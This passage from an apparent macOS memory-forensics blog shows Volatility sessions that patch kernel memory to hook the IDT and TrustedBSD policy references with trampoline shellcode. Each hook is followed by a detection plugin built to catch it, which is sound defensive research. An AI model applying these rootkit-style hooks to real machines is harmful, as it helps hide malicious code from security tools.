<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff80086049e5 89c1 MOV ECX, EAX</span><br />
<br />
<br />
The call to _vnode_pagein has been modified to call the code at the fake address.<br />
<br />
The output for the plugin after modifying the memory sample is as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkjHhCVq2unTpUHqlGvYXF7rM6wuAsi8t6GDn4MWeeshFMXSVjjAtPdmqrUrzYwseNIK94bhuFZFgHnN7BnR6BKJsllbepRnRpfMu1gmaFZdNfct851BcdvjTaU6n-x4quwCRxOv33T7O/s1600/call-ref.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzkjHhCVq2unTpUHqlGvYXF7rM6wuAsi8t6GDn4MWeeshFMXSVjjAtPdmqrUrzYwseNIK94bhuFZFgHnN7BnR6BKJsllbepRnRpfMu1gmaFZdNfct851BcdvjTaU6n-x4quwCRxOv33T7O/s1600/call-ref.png" height="25" width="400" /></a></div>
<br />
<br />
The check_call_references.py plugin can be found at my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_call_reference.py" target="_blank">GitHub repository</a> [2].<br />
<br />
<b>References</b><br />
[1] http://reverse.put.as/SyScan360%202013%20Presentation.pdf<br />
[2] https://github.com/siliconblade/volatility/blob/master/mac/check_call_reference.py<br />
<div>
<br /></div>
</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-33717151034439589512014-11-15T22:35:00.003-08:002016-03-15T23:06:55.898-07:00Tracing Bits of Coins in Mac Memory<iframe src="https://drive.google.com/file/d/0B-RHAnFvh1uMNXlmUGpHejJ6S3M/preview" width="580" height="480"></iframe>siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-5130421295848771282014-11-15T22:04:00.003-08:002014-11-15T23:21:43.134-08:00Detecting Shadow TrustedBSD Policy Tables In Mac MemoryIn this blog post the reference of the _mac_policy_list in _mac_proc_check_get_task will be modified to reference the 'shadow' TrustedBSD policy table and a Volatility Framework plugin to detect this type of hooking will be presented.<br />
<br />
<br />
<a name='more'></a><br />
<br />
Find a location to potentially inject the code, in this case 0xffffff7f8c04d6e5<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">## This section gets the address for possible code injection in the com.vmware.kext.vmhgfs kext</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">#get address for the kernel extension (kext) list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">p = self.addrspace.profile.get_symbol("_kmod")</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kmod = kmodaddr.dereference_as("kmod_info")</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">#loop thru list to find suitable target to place the trampoline in</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">while kmod.is_valid():</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> str(kmod.name)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if str(kmod.name) == "com.vmware.kext.vmhgfs":</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> mh = obj.Object('mach_header_64', offset = kmod.address,vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> o = mh.obj_offset</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> # skip header data</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> o += 32</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> txt_data_end = 0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> # loop thru segments to find __TEXT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> for i in xrange(0, mh.ncmds):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if seg.cmd not in [0x26]:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> for j in xrange(0, seg.nsects):</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> sect = obj.Object('section_64', offset = o + 0x48 + 80*(j), vm = self.addrspace)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> sect_name = "".join(map(str, sect.sectname)).strip(' \t\r\n\0')</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> # find __text section</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if seg.cmd == 0x19 and str(seg.segname) == "__TEXT" and sect_name == "__text":</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> print "{0:#10x} {1:#2x} {2} {3}".format(sect.addr,seg.cmd, seg.segname, sect_name)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> txt_data_end = sect.addr + sect.m('size') - 50</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if txt_data_end != 0:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> print "The fake function will be at {0:#10x}".format(txt_data_end)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> break</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> kmod = kmod.next</span><br />
<br />
The addresses for the functions in question in the original memory sample:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Name<span class="Apple-tab-span" style="white-space: pre;"> </span> Original Address</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_mac_proc_check_get_task 0xffffff800ac8ee20</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">_mac_policy_list<span class="Apple-tab-span" style="white-space: pre;"> </span> 0xffffff800aef4d28</span><br />
<br />
The disassembly of the original _mac_proc_check_get_task showing the reference to _mac_policy_list:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee20 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee21 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee24 4157 PUSH R15</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee26 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee28 4155 PUSH R13</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2a 4154 PUSH R12</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2c 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2d 50 PUSH RAX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2e 4989f6 MOV R14, RSI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee31 4989ff MOV R15, RDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee34 488d05ed5e2600 LEA RAX, [RIP+0x265eed]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee3b 8b400c MOV EAX, [RAX+0xc]</span><br />
<br />
<br />
The instruction in bold uses relative addressing, therefore [RIP+0x265eed] actually translates to 0xffffff800aef4d28 (current instruction address + displacement + OP size = 0xffffff800ac8ee34 + 0x265eed + 7), which is the original address of the _mac_policy_list.<br />
<br />
Modify the LEA instruction to refer to the fake location (0xffffff7f8c04d6e5): In this case we need to modify the displacement value (0x265EED) so it points to the fake policy list. The fake displacement is calculated by reversing the operations used to calculate the _mac_policy_list (fake address - current instruction address - OP size = 0xffffff7f8c04d6e5 - 0xffffff800ac8ee34 – 7 = 0x813BE8AA).<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><b>Original Displacement<span class="Apple-tab-span" style="white-space: pre;"> </span>Fake Displacement</b></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0x00265EED<span class="Apple-tab-span" style="white-space: pre;"> </span> 0x813BE8AA</span><br />
<br />
<b><span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Original Code<span class="Apple-tab-span" style="white-space: pre;"> </span>Fake Code</span></b><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">488d05ed5e2600<span class="Apple-tab-span" style="white-space: pre;"> </span>488d05AAE83B81</span><br />
<br />
\x48\x8d\x05 indicates that the operand size is 64 bit (0x48, REX.W), the instruction is LEA (0x8d) and using the register RIP + disp32 with RAX (0x05). The following value in bold is the displacement amount.<br />
<br />
After we rewrite the code at the original LEA at 0xffffff800ac8ee34, the disassembly will look like the following:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee20 55 PUSH RBP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee21 4889e5 MOV RBP, RSP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee24 4157 PUSH R15</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee26 4156 PUSH R14</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee28 4155 PUSH R13</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2a 4154 PUSH R12</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2c 53 PUSH RBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2d 50 PUSH RAX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee2e 4989f6 MOV R14, RSI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee31 4989ff MOV R15, RDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee34 488d05aae83b81 LEA RAX, [RIP-0x7ec41756]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0xffffff800ac8ee3b 8b400c MOV EAX, [RAX+0xc]</span><br />
<br />
The reference to the mac_policy_list has been modified to point to the fake location 0xffffff7f8c04d6e5 (0xffffff800ac8ee34 + -0x7ec41756 + 7).<br />
<br />
The output for the plugin after modifying the memory sample is as follows:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDMIstMTXnehouzITH9vJAw_X1sxvOszuEO5FQ5LaQ-8GPf5-TROF8Jzj8aNkFdigyQ6iP6UaUTIOIxeB_727BdfyiywbSwRMFPxfqrNJbZni8QzQ8MsWVukE0MtijSlr8MpCT_viOm8eT/s1600/check-trustedbsd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDMIstMTXnehouzITH9vJAw_X1sxvOszuEO5FQ5LaQ-8GPf5-TROF8Jzj8aNkFdigyQ6iP6UaUTIOIxeB_727BdfyiywbSwRMFPxfqrNJbZni8QzQ8MsWVukE0MtijSlr8MpCT_viOm8eT/s1600/check-trustedbsd.png" height="30" width="400" /></a></div>
<br />
The plugin check_shadow_trustedbsd.py can be found at my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_shadow_trustedbsd.py" target="_blank">GitHub repository</a> [3].<br />
<br />
References<br />
[1] http://reverse.put.as/2014/03/18/teaching-rex-another-trustedbsd-trick-to-hide-from-volatility/<br />
[2] http://ref.x86asm.net/geek.html#x0F2D<br />
[3] https://github.com/siliconblade/volatility/blob/master/mac/check_shadow_trustedbsd.py<br />
<div>
<br /></div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-74406358976503432572013-10-31T13:42:00.002-07:002013-11-01T16:38:18.897-07:00How to get Volatility working with OS X Mavericks?<div>Update: The Volatility Team has included my code changes so just grab the latest code to work on a Mavericks or 10.8.5 sample. You will still need the profiles below.</div><div><br></div>Until Volatility officially supports OS X Mavericks and Mountain Lion 10.8.5, here are the steps to get it going:<br>
<div>
<br></div>
<div>
<ol>
<li>Check out the latest Volatility code from the repository (v2.3):</li>
<pre>svn checkout http://volatility.googlecode.com/svn/trunk/ volatility-read-only</pre>
<li>Download the following files and place them in their respective folders:</li>
<table>
<thead></thead>
<tbody>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/profiles/Mavericks_10.9_AMD.zip" target="_blank">Mavericks_10.9_AMD.zip</a></td><td>volatility-read-only/volatility/plugins/overlays/mac/Mavericks_10.9_AMD.zip</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/profiles/MountainLion_10.8.5_AMD.zip" target="_blank">MountainLion_10.8.5_AMD.zip</a></td><td>volatility-read-only/volatility/plugins/overlays/mac/MountainLion_10.8.5_AMD.zip</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/mavericks-support/common.py" target="_blank">common.py</a></td><td>volatility-read-only/volatility/plugins/mac/common.py</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/mavericks-support/lsof.py" target="_blank">lsof.py</a></td><td>volatility-read-only/volatility/plugins/mac/lsof.py</td></tr>
<tr><td><a href="https://github.com/siliconblade/volatility/blob/master/mac/mavericks-support/netstat.py">netstat.py</a></td><td>volatility-read-only/volatility/plugins/mac/netstat.py</td></tr>
</tbody>
</table>
<li>And you should be done! It looks like only the check_trap_table plugin has issues, but that should be taken care of soon. Have fun!</li>
</ol>
</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-68714800847023172262013-07-27T21:51:00.001-07:002013-07-28T14:18:40.752-07:00Hooking IDT in OS X and Detection<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h2>
Summary</h2>
<div>
Continuing on the hooking all stuff OS X theme, in this post I'll discuss hooking the Interrupt Descriptor Table (IDT) and detecting these hooks with my check_idt plugin, which can be found in <b><a href="https://github.com/siliconblade/volatility/blob/master/mac/check_idt.py" target="_blank">github</a></b>. The hooking techniques that I'll use are modifying the IDT entry to point to a shellcode instead of its handler, and modifying the handler itself by inlining it.<br />
<br />
<a name='more'></a><br /></div>
<h2>
What is IDT?<br /><span style="font-size: small; font-weight: normal;">IDT associates each interrupt or exception identifier (handler) with a descriptor (vector) for the instructions that service the associated event. </span><span style="font-size: small;"><span style="font-weight: normal;"> What is an interrupt? An interrupt is usually defined as an event that alters the </span></span><span style="font-size: small; font-weight: normal;">sequence of instructions executed by a processor. </span><span style="font-size: small;"><span style="font-weight: normal;">Each interrupt or exception is identified by a number between 0 and 255. IDT can contain Interrupt Gates, Task Gates and Trap Gates. It is desirable to hook at this level because it can provide us with ring 0 access. You can get more information about IDT <a href="http://wiki.osdev.org/Interrupt_Descriptor_Table" target="_blank">here</a> and <a href="http://pdos.csail.mit.edu/6.828/2008/readings/i386/s09_04.htm" target="_blank">here</a>. Below are 64 bit structs of a descriptor and a gate as represented by the Volatility Framework:</span></span></h2>
<div>
<pre><span style="font-size: xx-small;">'real_descriptor64' (16 bytes)
0x0 : base_low16 ['BitField', {'end_bit': 32, 'start_bit': 16}]
0x0 : limit_low16 ['BitField', {'end_bit': 16, 'start_bit': 0}]
0x4 : access8 ['BitField', {'end_bit': 16, 'start_bit': 8}]
0x4 : base_high8 ['BitField', {'end_bit': 32, 'start_bit': 24}]
0x4 : base_med8 ['BitField', {'end_bit': 8, 'start_bit': 0}]
0x4 : granularity4 ['BitField', {'end_bit': 24, 'start_bit': 20}]
0x4 : limit_high4 ['BitField', {'end_bit': 20, 'start_bit': 16}]
0x8 : base_top32 ['unsigned int']
0xc : reserved32 ['unsigned int']
'real_gate64' (16 bytes)
0x0 : offset_low16 ['BitField', {'end_bit': 16, 'start_bit': 0}]
0x0 : selector16 ['BitField', {'end_bit': 32, 'start_bit': 16}]
0x4 : IST ['BitField', {'end_bit': 3, 'start_bit': 0}]
0x4 : access8 ['BitField', {'end_bit': 16, 'start_bit': 8}]
0x4 : offset_high16 ['BitField', {'end_bit': 32, 'start_bit': 16}]
0x4 : zeroes5 ['BitField', {'end_bit': 8, 'start_bit': 3}]
0x8 : offset_top32 ['unsigned int']
0xc : reserved32 ['unsigned int']</span></pre>
</div>
<h2>
Hooking the IDT Descriptor</h2>
<div>
To understand how to hook at the descriptor level, let's look at how the handler's address is derived from the descriptor (as usual using Volatility's <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_volshell" target="_blank">mac_volshell</a> interface on a OS X 10.8.3 x64 VM):<br />
<span style="font-size: xx-small;">32 bit:</span></div>
<div>
<pre><span style="font-size: xx-small;">handler_addr = real_gate64.offset_low16 + (</span><span style="font-size: xx-small;">real_gate64</span><span style="font-size: xx-small;">.offset_high16 << 16)</span>
<span style="font-size: xx-small;">
64 bit:
handler_addr = </span><span style="font-size: xx-small;">real_gate64</span><span style="font-size: xx-small;">.offset_low16 + (</span><span style="font-size: xx-small;">real_gate64</span><span style="font-size: xx-small;">.offset_high16 << 16) + (</span><span style="font-size: xx-small;">real_gate64</span><span style="font-size: xx-small;">.offset_top32 << 32)</span></pre>
</div>
<div>
So to hook the handler, the descriptor's fields will be loaded with parts of the target address that contains the shellcode. As in the <a href="http://siliconblade.blogspot.com/2013/07/offensive-volatility-messing-with-os-x.html" target="_blank">previous post</a> that talked about offensive techniques, I'll target the kext "com.vmware.kext.vmhgfs," specifically the __text section.<br />
<pre><span style="font-size: xx-small;"><a href="http://www.blogger.com/blogger.g?blogID=4784284837399262626" name="code1">>>></a> #get address for the kernel extension (kext) list
>>> p = self.addrspace.profile.get_symbol("_kmod")
>>> kmodaddr = obj.Object("Pointer", offset = p, vm = self.addrspace)
>>> kmod = kmodaddr.dereference_as("kmod_info")
>>> #loop thru list to find suitable target to place the trampoline in
>>> while kmod.is_valid():
... str(kmod.name)
... if str(kmod.name) == "com.vmware.kext.vmhgfs":
... mh = obj.Object('mach_header_64', offset = kmod.address,vm = self.addrspace)
... o = mh.obj_offset
... # skip header data
... o += 32
... txt_data_end = 0
... # loop thru segments to find __TEXT
... for i in xrange(0, mh.ncmds):
... seg = obj.Object('segment_command_64', offset = o, vm = self.addrspace)
... if seg.cmd not in [0x26]:
... for j in xrange(0, seg.nsects):
... sect = obj.Object('section_64', offset = o + 0x48 + 80*(j), vm = self.addrspace)
... sect_name = "".join(map(str, sect.sectname)).strip(' \t\r\n\0')
... # find __text section
... if seg.cmd == 0x19 and str(seg.segname) == "__TEXT" and sect_name == "__text":
... print "{0:#10x} {1:#2x} {2} {3}".format(sect.addr,seg.cmd, seg.segname, sect_name)
... txt_data_end = sect.addr + sect.m('size') - 50
... break
... if txt_data_end != 0:
... break
... print "The fake idt handler will be at {0:#10x}".format(txt_data_end)
... break
... kmod = kmod.next
...
'com.apple.driver.AudioAUUC'
'com.vmware.kext.vmhgfs'
0xffffff7f82bb2928 0x19 __TEXT __text
The fake idt handler will be at <b>0xffffff7f82bba6e5</b></span></pre>
</div>
To demonstrate this type of hooking I'll route the idt64_zero_div handler to the idt64_stack_fault handler by using a MOV/JMP trampoline. Before doing that, I'll need to get the addresses of these entities using my slightly modified check_idt plugin (added ent to the yield statement in the calculate method):<br />
<pre><span style="font-size: xx-small;">>>> import volatility.plugins.mac.check_idt as idt
>>> idto = idt.mac_check_idt(self._config)
>>> for i in idto.calculate():
... "Name {0} Descriptor address: {1:#10x}, Handler address {2:#10x}".format(i[3], i[9].obj_offset, i[2])
...
'Name _idt64_zero_div Descriptor address: <b>0xffffff8001306000</b>, Handler address <b>0xffffff80014cac20</b>'
...
'Name _idt64_stack_fault Descriptor address: <b>0xffffff80013060c0</b>, Handler address <b>0xffffff80014cd140</b>'</span>
</pre>
Now that all the required addresses are present, I can modify the shellcode to trampoline into idt64_stack_fault (0xffffff80014cd140) and inject it to the target location (0xffffff7f82bba6e5).<br />
<pre><span style="font-size: xx-small;">>>> import binascii
>>> buf = "\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xE0".encode("hex").replace("0000000000000000",struct.pack("<Q", <b>0xffffff80014cd140</b>).encode('hex'))
>>> self.addrspace.write(<b>0xffffff7f82bba6e5</b> ,binascii.unhexlify(buf))</span></pre>
<pre><span style="font-size: xx-small;">True</span></pre>
Shellcode in place, the idt descriptor can be modified to point to it:<br />
<pre><span style="font-size: xx-small;">>>> stub_addr = <b>0xffffff7f82bba6e5</b>
>>> idt_addr = <b>0xffffff8001306000</b>
>>> idt_entry = obj.Object('real_gate64', offset = idt_addr, vm=self.addrspace)
>>> self.addrspace.write(idt_entry.obj_offset,struct.pack('<H', stub_addr & 0xFFFF))
True
>>> self.addrspace.write(idt_entry.offset_high16.obj_offset + 2,struct.pack("<H", (stub_addr >> 16) & 0xFFFF))
True
>>> self.addrspace.write(idt_entry.obj_offset+8,struct.pack("<I", stub_addr >> 32))
True</span>
</pre>
I'll need some code to trigger the division by zero exception:<br />
<pre><span style="font-size: xx-small;">#include <stdio.h>
int main ()
{
int x=2, y=0;
printf("X/Y = %i\n",x/y);
return 0;
}</span>
</pre>
Running the division by zero code before and after hooking will result in the following:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZhyksIJfSg3Me7y9RvyGmE9RAqY3QXF5JOep27bqi19FDHoxBRiRFyc15wxEFNANCr1rZ4YSR2wLKO2fESrUsQ1EqJO-Ug41vquEFB6eKCwTH8ajmLVN5MXKi_RFpesNuoR2e0vpq7WsQ/s1600/Screen+Shot+2013-07-27+at+12.20.28+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZhyksIJfSg3Me7y9RvyGmE9RAqY3QXF5JOep27bqi19FDHoxBRiRFyc15wxEFNANCr1rZ4YSR2wLKO2fESrUsQ1EqJO-Ug41vquEFB6eKCwTH8ajmLVN5MXKi_RFpesNuoR2e0vpq7WsQ/s320/Screen+Shot+2013-07-27+at+12.20.28+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Output Before Hooking (zero division exception)</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoV0EIrPORFxpO9MjHzdb3sO0qdNlSPheVIetdql5s_7mQED4tlI-QmQcTrAomRscFZCc4VD8J6KXpQRHDJxy2tc97yDA4n0tgGHeHDnOoAGWYP1TIdNDz4PHXZPAGOU1PrAjJ9ZoAZVp/s1600/Screen+Shot+2013-07-27+at+12.22.09+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhoV0EIrPORFxpO9MjHzdb3sO0qdNlSPheVIetdql5s_7mQED4tlI-QmQcTrAomRscFZCc4VD8J6KXpQRHDJxy2tc97yDA4n0tgGHeHDnOoAGWYP1TIdNDz4PHXZPAGOU1PrAjJ9ZoAZVp/s320/Screen+Shot+2013-07-27+at+12.22.09+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Output After Hooking (stack fault exception)</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
The hook worked without crashing the system so there is room for more useful shellcoding ;)<br />
<h2>
Hooking the IDT Handler</h2>
<div>
In this technique, instead of hooking the idt64_zero_div entry's descriptor, I'll inline the handler itself by overwriting the top instructions with a MOV/JMP trampoline into the handler of the idt_stack_fault entry. The address of the handler found within the descriptor will remain the same. This will be important from a detection standpoint.<br />
<br />
After restarting the system to get a fresh start, I ran the script below to get the descriptor and handle information for the entries involved:<br />
<pre><span style="font-size: xx-small;">>>> import volatility.plugins.mac.check_idt as idt
>>> idto = idt.mac_check_idt(self._config)
>>> for i in idto.calculate():
... "Name {0} Descriptor address: {1:#10x}, Handler address {2:#10x}".format(i[3], i[9].obj_offset, i[2])
...
'Name _idt64_zero_div Descriptor address: <b>0xffffff8026506000</b>, Handler address <b>0xffffff80266cac20</b>'
...
'Name _idt64_stack_fault Descriptor address: <b>0xffffff80265060c0</b>, Handler address <b>0xffffff80266cd140</b>'</span>
</pre>
Now I can modify the shellcode with idt_stack_fault's handler address (0xffffff80266cd140) and inject it to idt64_zero_div's handler (0xffffff80266cac20):<br />
<pre><span style="font-size: xx-small;">>>> import binascii
>>> buf = "\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xE0".encode("hex").replace("0000000000000000",struct.pack("<Q", <b>0xffffff80266cd140</b>).encode('hex'))
>>> self.addrspace.write(0xffffff80266cac20 ,binascii.unhexlify(buf))
True</span></pre>
Here's the output for before and after hooking:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvvOOM7CN4pQZ2-NqR47azVpmUZsIQpL1nEcymBtpCobz-LSfG70SBetgbd9RnZw5X2NfQS_mAaWbUAH8yHNOy6TLSQjh-W4Z0D6Rfd0JHZAwbtoMsCUPAb2C1uMev0ZUyMgEZ2I0NMs-E/s1600/Screen+Shot+2013-07-27+at+10.50.36+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvvOOM7CN4pQZ2-NqR47azVpmUZsIQpL1nEcymBtpCobz-LSfG70SBetgbd9RnZw5X2NfQS_mAaWbUAH8yHNOy6TLSQjh-W4Z0D6Rfd0JHZAwbtoMsCUPAb2C1uMev0ZUyMgEZ2I0NMs-E/s320/Screen+Shot+2013-07-27+at+10.50.36+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Before and After Inline hooking</td></tr>
</tbody></table>
Once more the hook worked without crashing the system.<br />
<h2>
Detection</h2>
</div>
After showing that these attacks are possible on OS X 10.8.3, I'll use my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_idt.py" target="_blank">check_idt</a> plugin to detect each one of them.<br />
<br />
To detect a modified descriptor, the check_idt plugin checks to see if the handler's address is in the kernel, if the address refers to a known symbol, and if it starts with known strings. The result of a scan on the VM's memory with a hooked idt64_zero_div descriptor is as follows:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3pWlbIYIHskL0W3n3qawQqUsfm84OcFQ6A6JQeI0GlD95dskcHWQNRjw-XR-HADlNzi2vC_CkYT5NTWAfP8pn6UbU9FSyL9w1CUIwPTlyrJNeXiltuse6Zd6r9nKuGG3BEho0OZK8wOSV/s1600/Screen+Shot+2013-07-25+at+4.34.53+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="22" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3pWlbIYIHskL0W3n3qawQqUsfm84OcFQ6A6JQeI0GlD95dskcHWQNRjw-XR-HADlNzi2vC_CkYT5NTWAfP8pn6UbU9FSyL9w1CUIwPTlyrJNeXiltuse6Zd6r9nKuGG3BEho0OZK8wOSV/s320/Screen+Shot+2013-07-25+at+4.34.53+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">check_idt Results for a Hooked IDT Descriptor (idt64_zero_div)</td></tr>
</tbody></table>
As seen in the screenshot, the results will show the entry number, handler address, symbol name, access level (as in ring 0/1/2/3), selector, module/ kext for the handler, descriptor hook status, and handler inline hook status. Both 'Hooked' and 'Inlined' statuses show that the entry has been hooked.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
To detect an inlined handler, the check_idt looks for specific instructions found in a regular handler, such as LEA RAX, [RIP+0x2d4] and checks to see if the address (e.g. [RIP+0x2d4]) points to a proper handler function (e.g. hndl_allintrs). <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
